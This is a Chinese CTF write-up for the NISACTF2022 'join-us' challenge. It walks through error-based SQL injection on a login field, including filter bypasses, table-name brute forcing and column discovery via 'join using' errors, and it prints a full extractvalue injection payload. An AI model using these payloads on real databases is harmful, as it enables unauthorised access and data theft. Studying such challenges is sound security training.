首页 > 其他分享 >NISACTF2022--join-us(join using 无列名注入)

NISACTF2022--join-us(join using 无列名注入)

时间:2022-10-30 10:14:26浏览次数:49  
标签:join NISACTF2022 -- 列名 flag 报错 Fal using

join-us -- join-using 无列名查询

访问登录页面,看到一个cat u get flag 输入框 试试sql注入

有报错信息

 

 

黑名单

by updatexml database union columns = substr

 

 

爆数据库名

这里一步一步的测试过滤什么的时候,发现了 泄露了表的名称

在查询是 如果查询的列不存在 并且 没有关闭报错信息 可以查询一个不存在的列 这样会报错

 

 

爆表名

方法一、brup爆破

这里忘记了考虑 过滤= like替换了 直接爆破 一般我们创建的表都是在最后的

 

 

 

 

方法二、like替换=

 

 

join using 爆破列名

 

 

查出来Fal_flag有以下三列

id
data
i_tell_u_this_is_Fal(se)_flag_is_in_another
1'or/**/extractvalue(1,concat(0x7e,(select * from(select * from Fal_flag a join Fal_flag b using(id,data,i_tell_u_this_is_Fal(se)_flag_is_in_another))c),0x7e))--+

 

 

ok 不在上面的表

 

 

 

 

 

 

{3bfb0ba4-dac9-425a-9e0f-cf2672d7afdd}

或者查data,结果都是一样的,配个mid 显示后面的

 

标签:join,NISACTF2022,--,列名,flag,报错,Fal,using
From: https://www.cnblogs.com/yb0osing/p/NISACTF2022_join-us.html

相关文章

  • 论延迟退休、养老医疗和生育率的关系及个人观点
    延迟退休,必然导致很多岗位处于竞争状态,中年人无法职位上升空出位置给年轻人,年轻人无法获得足够的资源供给家庭开支,那么生育率自然不见起色,生育率和幸福指数成正相关关系。......
  • BlueTeam 加固
    加固免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.大纲基线核查操作系统LinuxWindowsw......
  • Eigen中旋转矩阵、四元数与变换矩阵的使用
    目录介绍一、旋转向量1.0初始化旋转向量1.1旋转向量转旋转矩阵1.2旋转向量转欧拉角(Z-Y-X,即RPY)1.3旋转向量转四元数二、旋转矩阵2.0初始化旋转矩阵2.1旋转矩阵转旋......
  • 第六章学习笔记
    一、梗概本章讲述了信号和信号处理;介绍了信号和中断的统一处理,有助于从正确的角度看待信号;将信号视为进程中断,将进程从正常执行转移到信信号处理;解释了信号的来源,包括......
  • 技术和资本的对立
    当今社会以资本为驱动的发展模式,导致技术和资本绝大部分情况都是对立的,资本以技术为生产要素,控制着技术者为其提供资本发展的驱动力,资本的本质应该是为人类社会发展所创造......
  • FR调用kettle
    packagecom.fr.data;importcom.fr.script.Calculator;importcom.fr.data.DefinedSubmitJob;importcom.fr.log.FineLoggerFactory;importcn.hutool.core.codec.Base64......
  • myrun
    github润学https://github.com/The-Run-Philosophy-Organization/runzhihu润学https://www.zhihu.com/collection/841467411......
  • ps 一些使用方法
    *消除污点操作:使用污点修复工具,可以擦拭掉图片上一些斑斑点点,使其和背景变成一致  *背景自然延长(1)先选择图片,然后“图像”->“画布大小”->“调整宽度,高度,百分比,定......
  • AcWing 1209. 带分数
    题目条件:枚举全排列,是9个数a,b,c的位数都还不知道枚举a,b,c的位数,枚举a和b的位数,c=9-a-b判断等式是否成立//暴力dfs#include<iostream>#include<cstrin......
  • 【游记】重生之 CSP 2022 卷土重来
    CSP2022游记\(\text{Day}1\)前面到底是\(\text{Day}0\)还是\(\text{Day}-1\)??\(\text{Day}-2\)打了场模拟赛,感觉状态不错。总和之前的模拟赛经验,发现只要不被......